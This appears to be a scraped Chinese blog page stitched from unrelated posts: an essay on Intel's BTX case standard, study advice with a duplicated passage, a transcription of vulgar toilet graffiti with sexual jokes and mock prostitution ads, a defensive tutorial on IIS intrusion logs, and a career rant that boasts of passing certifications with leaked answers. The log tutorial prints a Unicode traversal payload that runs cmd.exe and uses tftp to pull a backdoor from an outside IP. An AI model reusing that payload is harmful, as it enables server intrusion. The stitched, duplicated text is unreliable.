睡猫天下

BTX为何遭冷落？

原文发表在avan's blog中，配有多幅插图。阿凡的博客文章全部原创，如果喜欢，还请投上一票。

新产品刚推出时，技术上总是相对粗糙的。Intel当年在制定ATX1.0规范时看上去很不起眼的一个失误，所造成的负面影响至今却依然存在——拖了BTX的后腿。想要理解这句话的含义，还得容我从头说起。

    今天我们使用的电源遵循的规范是ATX，在此之前是AT电源。用在IBM PC/AT计算机上的电源就是AT电源，正如ISA总线也称作AT总线一样。从286、386、486一直到Pentium时代，AT电源的面貌都没有发生任何改变。时间到了1995年，Intel搭了Windows 95的顺风车，联合了包括Microsoft在内的十多家公司一起炒作APM（先进电源管理）概念，并顺势推倒了IBM的PC／AT规范，以ATX1.0取而代之。

    1995年6月发布的ATX规范是对AT的扩展，它提供的软关机与唤醒功能，给电脑用户带来了诸多便利。除此以外，Intel设计者还认为，AT电源“自内而外”的风向是导致电脑噪音大的根源，于是在ATX1.0中大刀阔斧地修改为“自外而内”——从机箱外部吸入空气，直接吹向CPU。Intel解释说，这种改变不仅可以减少噪音，还能够节省能源。但是，ATX 1.0付诸实践以后很快发现这种做法存在一个很大的问题：风扇会把电源盒中经过加热的空气直接吹在CPU上，对CPU散热非常不利，同时也容易使吸入的灰尘停留在机箱内和电路板上。难怪一篇文章指出，ATX 1.0犯了一个愚蠢的错误（boo-boo）。

    为了纠正“吸入式”的错误，仅仅两年以后，Intel就发布了ATX 2.0（1997年11月），将风向改回到“呼出式”的正确轨道上来，而且后来的ATX12V规范中，电源风扇仍维持“呼出式”设计。

    从ATX1.0升级到ATX2.0，Intel可以说是毫发无损，但PC制造商却吃尽了苦头，当时不少PC制造商首批ATX1.0机器刚离开生产线，就要转向2.0，模具投资的损失只有自己买单了。   
     时过境迁，2004年4月Intel发布BTX1.0的时候，人们发现在机箱前面板上又出现了一个吸入式的风扇，这一次，Intel的工程师们绕开风扇噪音的问题大谈其平衡术（BTX的英文全称：Balanced Technology eXtended，即：平衡技术扩展）的巧妙之处。当然，对于大水（Big Water，BTX的乳名）的冷却效果人们并不怀疑，至于其吸入式风扇设计是否会使机箱里积聚许多灰尘，就很让人放心不下了。

    早在2004年春季IDF上Intel就展示了BTX规格，但直到2年后的今天，市场上却仍然难觅BTX电脑的踪影。对此，相关人士不免心存疑虑，猜测BTX是否已经胎死腹中。这种怀疑并非完全没有道理，想想过去从AT向ATX规范转移时，PC制造商积极响应，众人拾柴火焰高。再看看今天的冷清场面，两相比较反差实在太大了

    哪些因素导致BTX“雷声大，雨点小”的现状呢？依我看来，主要原因是成本和心理两个方面的原因。首先，BTX规格会使PC机箱成本提高，在低价竞争的市场背景下，升级到BTX显然是不明智的。其次，ATX1.0因技术缺陷而迅速消失的情景仍深深地印在人们的大脑中，如果BTX1.0也存在ATX1.0式的失误，Intel只需一纸公文就可以将1.0升级到2.0，并且堂而皇之地对PC制造商说：“老大我不想玩BTX1.0了，兄弟们如果不想跟着玩BTX2.0，那就悉听尊便吧！”

    可以想象，面对Intel的压力，只有少数PC制造商会采取不合作的姿态进行抵制，多数PC制造商则会静观其变，而挑过BTX1.O直接升级到BTX2.0，才是稳妥的策略。当然，Intel可以使用各种手段搞定PC制造商，但是电脑用户对BTX的漠视，却是无法搞定的。

    当年ATX取代AT着眼于满足用户需求，而BTX取代ATX则是为了应对节节攀升的CPU功耗。既然BTX的出发点是解决CPU过热的难题，反倒要让用户为增加的成本买单，甚至还要为新增的风扇支付电费，这是什么逻辑！难怪有人把BTX戏称做“变态的X”。

   既然PC制造商和用户都不能从BTX规范中受益，Intel为什么还要强行推出BTX呢？Intel当然有自己的如意算盘：首先，强化散热效果可以掩盖其处理器漏电流过大的工艺缺陷；其次，还可借此打压竞争对手。   

    2004年Intel首推90nm工艺处理器时，其104W的惊人功耗一定是把Intel自己人给吓懵了，所以匆匆抛出BTX以应不测。后来却发现想象中的糟糕情况并未发生，多核技术的应用延缓了功耗随频率猛增可怕后果的出现，对ATX机箱稍加改良——在机箱后部加装呼出式风扇，或者在机箱侧面开一个通风孔（所谓的38度机箱），便可从容应对，既省事又省钱，根本用不着去玩什么平衡术，BTX不过是Intel摆出的花架子。

     尽管如此，Intel仍然表示，BTX在2006年上半年的采用率为24％，到2007年底，将有36％的Intel平台PC采用BTX。与Intel对BTX的满腔热情相对比，AMD近期表示并不需要BTX。AMD向来不愿做Intel的跟屁虫，倒是国内媒体争相报道BTX。国内媒体为什么总是免费为Intel做宣传，这种现象值得深思。

无线安全八大主流技术及解决方案

请不要做浮躁的人

1.不要看到别人的回复第一句话就说：给个代码吧！你应该想想为什么。当你自己想
出来再参考别人的提示，你就知道自己和别人思路的差异。
2.初学者请不要看太多太多的书那会误人子弟的，先找本系统的学，很多人用了很久
都是只对部分功能熟悉而已，不系统还是不够的。
3.看帮助,不要因为很难而自己是初学者所以就不看；帮助永远是最好的参考手册，
虽然帮助的文字有时候很难看懂，总觉得不够直观。
4.不要被对象、属性、方法等词汇所迷惑；最根本的是先了解最基础知识。
5.不要放过任何一个看上去很简单的小问题--他们往往并不那么简单，或者可以引伸
出很多知识点；不会举一反三你就永远学不会。
6.知道一点东西，并不能说明你会写脚本，脚本是需要经验积累的。
7.学脚本并不难，JSP、ASP、PHP等等也不过如此--难的是长期坚持实践和不遗余力的博览
群书；
8.看再多的书是学不全脚本的，要多实践
9.把时髦的技术挂在嘴边，还不如把过时的技术记在心里；
10.学习脚本最好的方法之一就是多练习；
11.在任何时刻都不要认为自己手中的书已经足够了；
12.看得懂的书，请仔细看；看不懂的书，请硬着头皮看；
13.别指望看第一遍书就能记住和掌握什么——请看第二遍、第三遍；
14.请把书上的例子亲手到电脑上实践，即使配套光盘中有源文件；
15.把在书中看到的有意义的例子扩充；并将其切实的运用到自己的工作中；
16.不要漏掉书中任何一个练习——请全部做完并记录下思路；
17.当你用脚本到一半却发现自己用的方法很拙劣时，请不要马上停手；请尽快将余
下的部分粗略的完成以保证这个代码的完整性，然后分析自己的错误并重新编写和工
作。
18.别心急，写脚本确实不容易；水平是在不断的实践中完善和发展的；
19.每学到一个脚本难点的时候，尝试着对别人讲解这个知识点并让他理解----你能
讲清楚才说明你真的理解了；
20.记录下在和别人交流时发现的自己忽视或不理解的知识点；
21.保存好你做过的所有的源文件----那是你最好的积累之一；
22.对于网络，还是希望大家能多利用一下，很多问题不是非要到论坛来问的，首先
你要学会自己找答案，比如google、百度都是很好的搜索引擎，你只要输入关键字就
能找到很多相关资料，别老是等待别人给你希望，看的出你平时一定也很懒！
23，到一个论坛，你学会去看以前的帖子，不要什么都不看就发帖子问，也许你的问
题早就有人问过了，你再问，别人已经不想再重复了，做为初学者，谁也不希望自己
的帖子没人回的。
24，虽然不是打击初学者，但是这句话还是要说：论坛论坛，就是大家讨论的地方，
如果你总期望有高手总无偿指点你，除非他是你亲戚！！讨论者，起码是水平相当的
才有讨论的说法，如果水平真差距太远了，连基本操作都需要别人给解答，谁还跟你
讨论呢。

能找到很多相关资料，别老是等待别人给你希望，看的出你平时一定也很懒！
23，到一个论坛，你学会去看以前的帖子，不要什么都不看就发帖子问，也许你的问
题早就有人问过了，你再问，别人已经不想再重复了，做为初学者，谁也不希望自己
的帖子没人回的。
24，虽然不是打击初学者，但是这句话还是要说：论坛论坛，就是大家讨论的地方，
如果你总期望有高手总无偿指点你，除非他是你亲戚！！讨论者，起码是水平相当的
才有讨论的说法，如果水平真差距太远了，连基本操作都需要别人给解答，谁还跟你
讨论呢。

浮躁的人容易问：我到底该学什么；----别问，学就对了；
浮躁的人容易问：JS有钱途吗；----建议你去抢银行；
浮躁的人容易说：我要中文版！我英文不行！----不行？学呀！
浮躁的人分两种：只观望而不学的人；只学而不坚持的人；
浮躁的人永远不是一个高手。

无线网的安全防范

一日去西安某大学，释放体内多余物质时,惊然发现,门板上可谓精彩备极…
　　
　　以下为门板上的字,字体是各具精彩.(注:数字是本人添加进去的,到20楼才有人加了数字,以后的回复前面便有数字了).偶也够无聊够猥琐的,拿着个本子,站在那儿抄….
　　
　　1,嗯,今天天气不错.心情也蛮好.　　
　　2,唉,天气预报说今晚会下雨.昨天女友还刚和我分手.痛苦啊.　　
　　3,痛苦吗？你不说大伙怎么知道?我这里有几包YAO TOU丸.保证令你HIGHT上天堂,如果需要,请打110订购.,　　
　　4,兄弟,那个丸价钱多少一颗?我想买几个今晚泡汤喝.　　
　　5,那个丸呀.你直接打电话去咨询不就得了?说不定量大还有优惠呢.呵呵.　　
　　6,那个丸比**更Hight吗？还是**第一啊.　　
　　7,**?什么叫**?　　
　　8,[骂人可耻]了吧?**就是拿你的小 J J,放进女孩的小 ** 里.来来回回的动.懂不?　　
　　9,你也[骂人可耻]了吧?**其实就是拿起我的大[骂人可耻](超寒,写得也太露骨了).插进漂亮MM的小**.如果你有好货,我示范给你看看.　　
　　10,楼上的,我们刚来的美术实习老师蛮漂亮的,你啥时候过来表演给我看看?　　
　　11,乱写乱画.以上十人各罚款五十,请到校长处交罚款.打以下电话,有八折优惠.135.....(号码省略,经测试,是一老师号码)　　
　　12,谁说王老师那里有八折的?你请他办事,还得请吃请喝.到头来.是300%呀.各位兄弟不要被忽悠了.　　
　　13,呵呵,我又来了.很好玩啊　　
　　14,好玩?如果被03级的主任知道是你写的,看你还好玩不?　　
　　15,严重BS楼上的,破坏纪律,应当拉出去解决.各位觉得如何.　　
　　16,嗯,第14条不好玩,管理员删掉它并封它ID吧　　
　　17,对,封他ID,另外提醒各位一下,当你要拉大屎时,请拉好你的马步,否则出来的将很小块,明白吗？　　
　　18,楼上的是少林寺俗家弟子?拉屎也要马步?　　
　　19,佛语有道:夕阳照屋梁,哥哥妹妹入房中,上下左右摆,快乐似神仙.　　
　　20,孔子有日:男有一神鞭,女有一仙洞,神鞭进仙洞,摇摆便成佛　　
　　21,孔明有云:阿妹Xiong前肉,看了就想摸,猛哥辣妹入草丛,管他三国谁称雄.　　
　　22,孟子有语:不管星期几,只要没Yue Jing,就可持猛特,击其潮湿地.　　
　　23,楼上强Yin诗圣.一日,我巧遇潘金莲,欲心顿起,强入其内,莲妹娇语:啊,你的好大!　　
　　24,王主任语:阿妹阿妹你真乘,乘乘跟我入房中,入了房中听我话,英语四级没问题　　
　　25,方芳芳语:主任主任你真坏,入房过后还想要,要了之后又想要,怎样才能填你胃?　　
　　26,平时英语一般的小芳过了四级,不知咋过的.有谁知道?　　
　　27,阿弥陀佛,色即是空,空即是色　　
　　28,愿主保佑,阿门!　　
　　29,惨了,接不下去了　　
　　30,楼上的接不下去了?那你拉屎干嘛!把它给塞回去　　
　　31,塞回去?粪池里屎才济济,哪陀屎才是你的?　　
　　32,教你一招.一一尝试便可.味脆不油腻的则属自已的.楼下的试过了吗？

33,这招不行,没听过“血浓于水“吗？其实,粪也是一样的,抽自己的血3000ml.撒入粪池内,交融者便是自己的
　　
　　33,无聊的人还真多啊
　　
　　34,来了这里之后,我发誓要做一名科学家,专门研究厕所文化
　　
　　35,看见楼上之后,我发誓要做一名心理学家.专门研究厕所变Tai者
　　
　　36,床前鞋两双,床上人一对,房术四十八,一一皆源此
　　
　　37,看完了,拉完了.写完了.

38,Xing感在校生,一次400,两次700,包夜九百.欢迎联系*******(寒,校长办公室电话)
　　
　　39,可爱在校生,一次350,两次600,包夜800,包君满意,欢迎品尝.联系QQ:28**
　　
　　40,狂野在校生,一次300,两次500,包夜700,刺激有趣,回味无穷,请拔打联系电话135*(和11楼号码相同)
　　
　　41,可怜在校生,一次200,两次300,包夜350,节假日不休.本周六有八折优惠
　　
　　42,楼上的电话多少?
　　
　　43,请拔打114查询
　　
　　44,拔打在校女生联盟全国免费咨询电话还实在,800-800-800
　　
　　45,楼上骗人,电话根本打不通.
　　
　　46,楼上傻子,电话也能打得通?
　　
　　47,楼上笨蛋,拿一铁棍,猛插电话便能打通
　　
　　48,众人皆醉,我独醒,独我醒呀.
　　
　　49,特大国际新闻:小布喜欢小泉.欲于2006年迎娶小泉.
　　
　　50,我是来拉尿的,看完了,画只龟做个纪念.
　　
　　51,本人到此一游.

52,攻打伊拉克,实际上,是我安排的.小布是我的属下
　　
　　53,千部免费jiqing电影下载,绝对免费.骗你不是人!
　　
　　54,网址呢?
　　
　　55,www.***.com (寒,本人正是因此而知道广告的,不知有没有同学看见此贴?)
　　
　　56,笑话由他笑话,Yin 贼我自任之

57,人体最贵重的是什么?Yin Jing!
　　
　　58,那女的没Yin Jing咋办?
　　
　　59,比Yin J更贵重的是什么? Yin D!
　　
　　60,看见“更贵重“的东西,我条件反射的硬了
　　
　　61,怎么没有第33楼?
　　
　　62,我真傻
　　
　　63,我比你更傻
　　
　　64,傻人有傻福嘛.楼上两位不要自卑,其实,我比你们聪明不到哪
　　
　　65,我们都上61楼的当了.枉我自称校园第一才子....
　　
　　66,莫非楼上就是闻名校园的少女杀手--恐老王?
　　
　　67,非也非也,恐老王经偶的高超医术,已变人见人爱的哈巴Gou王了
　　
　　68,呵呵,喜欢24楼的20楼的.中国未来的著名作家呀.
　　
　　69,我最近老爱往这间厕所跑,呵呵.我也画个龟作个记号.
　　
　　70,这间厕所出名了.CCTV将于明天现场直播.请各位密切关注.以上由小王现场报道
　　
　　71,Yin D 紧缩术,圆你美满Xing爱,请拔打******* (寒,又是校长办公室电话)
　　
　　72,Yin J 增粗增长,增强Xing能力!拔打*******免费咨询(同上,校长电话)
　　
　　73,拉完屎了很早了,看完了再走,也画只龟作个记号

74,校园西幢的女生宿舍有好东西看哦.
　　
　　75,Ma 的!楼上的你说来干啥,我们被发现了!
　　
　　76,我不当Se Lang很多年.
　　
　　77,人心散了,队伍不好带了
　　
　　78,我最烦你们乱回复,一点语言技术都没有.
　　
　　79,楼上的,你过得了我吗？
　　
　　80,我想试试.
　　
　　81,严肃点,严肃点,不许乱,我们这儿群P呢.
　　
　　82,你丫的急啥?洗净P股等我
　　
　　83,我已经洗干净了,你人在哪?
　　
　　84,出来混,迟早都是要被插的.
　　
　　85,你们是在草菅人命！谁说的?反正不是我说的.
　　
　　86,李大哥,你回来了. (这个我知道是改自连战回西安时,一小学生所说的“连爷爷,你回
　　来了“)
　　
　　87,学生主席敬告:此处不许大小便,违者将罚与超级校花**(传闻是校园一个很Diao又很
　　丑又有钱的“女人“)
　　
　　88,主席先生,此处不拉屎何处拉屎?
　　
　　89,校园何处无茅厕,此处不拉屎,自有拉屎处,欢迎到校长办公室免费拉屎一次.
　　
　　90,屎!尿!不要浪费了,校园花草的生长需要我们的行动,提倡随地大小便.
　　
　　91,屎与尿是很有营养价值的,可用于蒸、炒、煮、焖,味道鲜美.实乃厨房必备菜之一.
　　
　　92,此处大小便的是Gou.Gou在此处大小便.嘿嘿

93,Ma 的,楼上的是谁.查出来L J!
　　
　　94,同意楼上,现在我命令你,由你去执行,否则把你也L J了.
　　
　　95,批准楼上二楼去调查,否则L J你们三位.
　　
　　96,走,抱个美男找校长聊天去.
　　
　　97,惨了惨了,原来这里有这么同Xing恋.我要搬到女生宿舍!
　　
　　98,你说要搬就搬?问过我没?我是女生终结者
　　
　　99,我对92的遭遇表示深切哀悼,对其家属表示慰问
　　
　　100,我对93-95楼的行为表示强烈不满,希望其作出深刻的检讨
　　
　　101,我欲拉屎而来,又恐粪味弥天,低处不胜香!
　　
　　102,呵呵,我是来拉屎的,大伙继续.
　　
　　103,你说继续就继续?Lao子不Gan.
　　
　　104,尔不干干啥?啥干干啥.干啥干啥.
　　
　　105,楼上意味悠长.实乃我等不可等闲视之.佩服佩服.
　　
　　106,前楼啥意思?偶文化低,不懂,谁能解释一下?
　　
　　107,哗!104果然高人,语言果然精辟!可惜俺也没看懂.呵呵.
　　
　　108,各位,楼下有一绝世武功.超厉害,请看招?
　　
　　222,我?啥招?看我“跳楼“绝招.
　　
　　110,N N滴,幸亏你碰上我,跳222摔死你丫的,欢迎拔打110免费聊天.
　　
　　111,呵呵,明白前楼的意思了.为啥不使出降老十八掌?
　　
　　112,天啊!看着看着忘擦P股了,屎都干巴巴的.
　　
　　113,楼上的~~~老板!换笔!
　　
　　114,换笔干啥,丫的不知现在经济风暴?能省则省啊.
　　
　　115,阿弥陀佛,贵僧我化缘而来.善哉善哉.
　　
　　116,楼上上过女人没?
　　
　　117,楼上粗俗,咱是斯文人,应说:你打过炮吗？
　　
　　118,咱当兵的人,当然打过炮.机关炮,冲天炮,一泄千里炮

119,军人是用来尊重滴.
　　
　　120,Lao L的,楼上坏纪律,火灾请打120.
　　
　　121,啥?120抢119生意?不厚道啊.
　　
　　122,现在市场经济,商场无父子嘛.
　　
　　123,楼上精辟,收我为徒吧,师父.
　　
　　124,猴儿,你又乱拜师父了?小心我念咒
　　
　　（打不出那几种字符出来,呵呵)
　　
　　125,师父!猴哥他不尊重你啊.往死念.
　　
　　126,楼上莫非八戒?对高老庄事件怀恨在心?
　　
　　127,哈~~~笑死我了.
　　
　　128,我对楼上的逝世感到悲痛,愿他在天之灵能够安息.阿门.
　　
　　129,写不下了.老板换门!
　　
　　130,谁说写不下的?

131，肯的能写下了！要不，老板，换门继续写下去啊！

我用易语言编程 发几个自己喜欢的

快速掌握典型入侵日志分析

如今各式各样的Windows漏洞层出不穷，五花八门的入侵工具更是令人眼花缭乱，稍微懂点网络知识的人都可以利用各种入侵工具进行入侵，这可给我们的网管带来了很大的麻烦，虽然经过精心配置的服务器可以抵御大部分入侵，但随着不断新出的漏洞，再高明的网管也不敢保证一台务器长时间不会被侵入，所以，安全配置服务器并不能永远阻止黑客入侵，而如何检测入侵者行动以保证服务器安全性就在这样的情况下显得非常重要。
日志文件作为微软Windows系列操作系统中的一个特殊文件，在安全方面具有无可替代的价值。它每天为我们忠实地记录下系统所发生一切事件，利用它可以使系统管理员快速对潜在的系统入侵作出记录和预测，但遗憾的是目前绝大多数的人都忽略了它的存在，反而是因为黑客们光临才会使我们想起这个重要的系统日志文件，很有讽刺意味。
　　在这里我们就不去讲什么日志文件的默认位置、常见备份方法等基本技巧了，这样的东西黑防以前讲得很清楚了，大家可以翻看黑防以前的杂志学习这些东西，我们今天来看看如何分析常见的日志文件吧！

1．FTP日志分析
FTP日志和WWW日志在默认情况下，每天生成一个日志文件，包含了该日的一切记录，文件名通常为ex（年份）（月份）（日期）。例如ex040419，就是2004年4月19日产生的日志，用记事本可直接打开，普通的有入侵行为的日志一般是这样的：
#Software: Microsoft Internet Information Services 5.0（微软IIS5.0）
#Version: 1.0 （版本1.0）
#Date: 20040419 0315 （服务启动时间日期）
#Fields: time cip csmethod csuristem scstatus
0315 127.0.0.1 [1]USER administator 331（IP地址为127.0.0.1用户名为administator试图登录）
0318 127.0.0.1 [1]PASS – 530（登录失败）
032:04 127.0.0.1 [1]USER nt 331（IP地址为127.0.0.1用户名为nt的用户试图登录）
032:06 127.0.0.1 [1]PASS – 530（登录失败）
032:09 127.0.0.1 [1]USER cyz 331（IP地址为127.0.0.1用户名为cyz的用户试图登录）
0322 127.0.0.1 [1]PASS – 530（登录失败）
0322 127.0.0.1 [1]USER administrator 331（IP地址为127.0.0.1用户名为administrator试图登录）
0324 127.0.0.1 [1]PASS – 230（登录成功）
0321 127.0.0.1 [1]MKD nt 550（新建目录失败）
0325 127.0.0.1 [1]QUIT – 550（退出FTP程序）
从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统，换了四次用户名和密码才成功，管理员立即就可以得知这个ＩＰ至少有入侵企图！而他的入侵时间、IP地址以及探测的用户名都很清楚的记录在日志上。如上例入侵者最终是用Administrator用户名进入的，那么就要考虑此用户名是不是密码失窃？还是被别人利用？接下来就要想想系统出什么问题了。

２．WWW日志分析
WWW服务同FTP服务一样，产生的日志也是在%systemroot%\sys tem32\LogFiles\W3SVC1目录下，默认是每天一个日志文件。这里需要特别说明一下，因为Web的日志和其他日志不同，它的分析要细致得多，需要管理员有丰富的入侵、防护知识，并且要足够的细心，不然，很容易遗漏那种很简单的日志，而通常这样的日志又是非常关键的。由于我们不可能一个一个分析，所以这里举个简单例子：
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20040419 03:091
#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
通过分析第六行，可以看出2004年5月19日，IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口，查看了一个页面iisstart.asp，这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt，有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。
对现在非常常见的SQL注入式攻击，通过对put、get的检查，也可以大概判断是那个页面出了问题，从而修补。
３．HTTPD事务日志的分析
Microsoft的IIS 5自公布到现在，被黑客利用的漏洞多不胜数，像.ida/.idq、unicode、WebDavx3和一些未知的漏洞，我们分析日志的目的就是为了分析黑客入侵的行为，对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。为了给大家介绍一个比较醒目的介绍，专门配置了个“古老”的服务器，用旧漏洞给大家做个演示，很容易触类旁通就懂其它了。
（１）unicode漏洞入侵日志记录
这个是个非常经典的漏洞了，要找这样的服务器估计得去国外慢慢找了，但是因为它的日志是最经典的一个，所以我们这里特别拿它来做个示范。
我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%\system32\LogFiles\文件夹下，如图１所示是一个典型的Unicode漏洞入侵行为的日志记录，对于正常的Web访问，是通过80端口用GET命令获取Web数据，但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此漏洞。如图一所示。（图１）。
我们配合入侵来看下这样的记录：通过下面的编码我们在入侵的时候可以查看目标机的目录文件：
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
则日志中会记录下此访问行为：
2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -
看到了吗？我们的日志中记录地一清二楚，来自192.168.0.1的攻击者查看我们的目录。下面一行是向我们的机器传送后门程序的日志记录：
2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll
502 –
看到了吧？记录非常详细的，系统里面那个程序在响应都记录了下来，这样我们分析入侵行为就好办了。
（２）WebDavx3远程溢出日志记录
过去一段时间有名的Wevdavx3漏洞是应用最广泛的，如果系统遭受了此远程溢出的攻击行为，则日志记录如图二所示。（图２）。
2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……
这表示我们的Web服务受到了来自192.168.0.218的攻击，并锁定(即关闭)了WEB服务，后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。
上面的几种日杂都记录了有入侵行为的IP地址，但此IP地址说不定就是攻击者使用了跳板，也就是说此IP很可能是“肉鸡”而不是攻击者的IP，遇到这样的情况，我们再查看其他日志文件，还是有可能追查出攻击者的位置的，但这个就完全靠管理员的经验了。
４．日志文件的移位保护
通过上面的几个方法，大家应该可以检测普通的系统攻击了，但话说回来，如果上面的攻击任何一个成功了，那现在我们都看不到日志了，早被入侵者清空了，所以，为了防患于未然，我们还是针对常见的删除日志的方法，把日志挪挪吧。
好多文章介绍对事件日志移位能做到对系统系统很好的保护，移位虽是一种保护方法，但只要在命令行输入dir c:\*.evt/s，一下就可查找到事件日志位置，再删除可容易了，那怎么办呢？其实日志移位要通过修改注册表来完成，找到注册表 HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\ Services\Eventlog下面的Application、Security、System几个子键，分别对应“应用程序日志”、“安全日志”、 “系统日志”。如何修改呢？下面我们具体来看看Application子键：File项就是“应用程序日志”文件存放的位置，把此键值改为要存放日志文件的文件夹，我们再把%systemroot%\system32\config\appevent.evt文件拷贝到此文件夹，再重启机器就可以了。
在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性，如果不移位也无法对文件进行安全设置操作，右击移位后的“文件夹选择属性”，进入“安全”选项卡，不选择“允许将来自父系的可继承权限传播给该对象”，添加“System”组，分别给Everyone组“读取”权限，System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小，如20MB。进行了上面的设置后，直接通过Del C:\*.Evt/s/q来删除是删不掉的，相对要安全很多了。
通过上面的几个实际的例子，相信大家都应该具备分析普通入侵日志的能力了，再结合一定的实际经验，通过日志来发现系统漏洞、追踪入侵者就简单很多了。希望此文能抛砖引玉，给大家带来一些帮助。

__________________________________________________________________________

这篇帖子在转的时候就没有图,如果贴主把图补贴的话,我会修改的

作者：xiaodudu512
在五点二十九的我是白领圈子里看到很多人发牢骚，说薪水少，可在我看来，你们这样的人拿得到高薪才怪！ 
　　　　 
　　　　我先问一句：这里有多少人是本科的？有多少人是正规本科的（不算自考，成考和专升本）？有多少人是有学位的？有多少有学位的是拿着网大排名前５０所大学的学位的？恐怕是少之又少吧！在中国，薪水和学位的关系对于应届生来说是绝对的，即使对于以后的发展，学位也很重要，要不那些低学历的人评职称为什么吃亏呢？你可以告诉我这不合理，不错，这确实不合理，但却是现实。如果你不能改变现实，那还是适应它吧！你也可以告诉我低学历一样可以拿高薪，我承认，不过你要准备比别人多付出１０倍以上的努力。 
　　　　 
　　　　接下来是语言，这里恐怕是有不少人没有过四级没学位的吧？有多少过六级的？有多少过专四专八的？有多少有其他英语证书的？你不要和我说你的水平好，可不喜欢中国的考试制度，所以没证书。在中国，毕业一开始的几年就是靠证书，你有本事跳过１楼２楼造３楼吗？如果你英语不行，你有其他二外吗？要知道，老外对于it的重视可是比国内那些买的电脑做装饰品的土老帽要强得多。 
　　　　 
　　　　其实这些都不是最重要的，最重要的做人的风格，现在很多it人除了技术什么都不懂，整天得罪人。哪怕你是四个ccie全考出的，我不用你难道地球就不转了？中国多的是人，技术有什么了不起的？更何况很多技术是根本用不到的。 
　　　　 
　　　　现在总看到一些所谓的“技术牛人”在误导新人，你们知不知道你们是在误人子弟啊！自己混不出头，还要去害别人，今天要和你们好好算算帐。 
　　　　 
　　　　先自我介绍一下，我是９８年从上海交大毕业的，在ms工作了６年，现在在一家系统集成公司工作。 
　　　　第一个意见：读书最重要，就是为文凭。我承认大学里确实学不到什么东西，但为了文凭请一定要认真读。这个社会要文凭，没办法。还有大学成绩要读好一些，像ms,cisco,oracle这些大公司是会看的。读大学还有一个好处是大学很空，你可以自己去学想学的东西，不过学校的功课永远是最重要的。那些大专的不要以为本科生学不好技术，确切得说并没有几个优秀的学生是书呆子。没有什么规定说大专生学技术有优势。 
　　　　 
　　　　第二个意见：好好读英语，要想在it立足，英语是必须的。至少要过六级，如果能有专八或者中高口证书或者bec什么的就更好，最好还要有二外，可以考虑德语或者日语。作it一定要去外企，国企绝对没前途。 
　　　　 
　　　　第三个意见：要认真选择入的行业。it是非常广泛的概念，网络只是其中一个非常小的（而且也是非常没有前途的）领域。it最有前途的领域是什么？是开发，开发中最有前途的是什么？是硬件开发，也就是电子工程，那些家伙的月薪差不多是我的年薪（我现在月薪是税后１０K）；其次是软件开发，不过很苦，而且需要不错的数学基础，不过在中国不要去搞通用件开发，一盗版全完，最好是搞ERP类的专用系统开发，连开发带维护都有了。如果你没有数学基础，却有不错的美学功底，那就去搞设计，photoshop也好，autocad也好，3dsmax也好,flash也好，视屏后期处理也好，但不要搞网页设计（无论是前台还是后台），因为一个人作的模扳一万个人用，不会有好的收入的。再不行就来搞网络和系统，这个方面最好搞数据库，不过这样又要涉及到开发，如果搞网络也要搞部署（系统集成），或者去大公司作技术支持，最差的就是作维护了。 
　　　　 
　　　　为什么说维护是最次的？因为无论是什么公司，维护都不是主营业务，或者说，不会为公司带来收入。在公司，能直接影响利润的部门收入才高，所以说任何企业，最重要的是销售和市场，其次是研发和生产，至于我们维护部门，不过是和扫垃圾的和扫厕所的一个级别而已。 
　　　　 
　　　　维护虽然是最差的，但不代表不能拿高薪。首先，要去大的外企，他们对于it部门的重视程度高。第二，要学会为人处世，我们本来就是服务部门，所以对其他部门的人要热情一些，主动一些，不要老摆个“高手”的臭架子。要知道，技术如果不能换钱，那不过是垃圾而已。第三，不要老是问老板要钱换设备，我们已经不能产生利益了，就要让老板感觉我们能节约管理成本，我们的任务是最大限度利用现有的设备，而不是整天采购新的设备。 
　　　　即使如此，我所谓的高薪不过是在维护这个领域里的高薪而已，和其他主要部门是不能比的。所以最好还是跳出这个行业的好，去作系统部署。而作系统部署不要去做部署人员（即使暂时作，将来也一定要做项目经理），这是民工都可以做的。或者就是做方案销售，这样你就是企业的主营业务了。 
　　　　 
　　　　顺便说一下我对认证的看法，相对与学历和英语，它是最不重要的。当年我去ms，靠的不是什么mcse，而是我的专八和名校学历。ms的面试并不关心你的技术，而是关心你是否聪明，是否能溶入企业文化。还有，国内好象很多人对ms不满，因为软件太贵了，这些钱都进了我们这些技术支持的口袋了，不错，ms的员工薪水很高，可这是我们努力工作换来的，我们每天都要工作１２小时左右，xp刚发行那段日子xp组的工程师都要工作到凌晨２－３点，白天还是9点上班，难道我们不该拿高薪吗？至于mcse我是进ms后再考的，没有看过书，全是靠*****过的，也就是你们所说的paper，不过我想说一句，对于应届生，你不用在意自己是不是paper，因为企业已经默认你是paper了，所以无所谓的。 
　　　　 
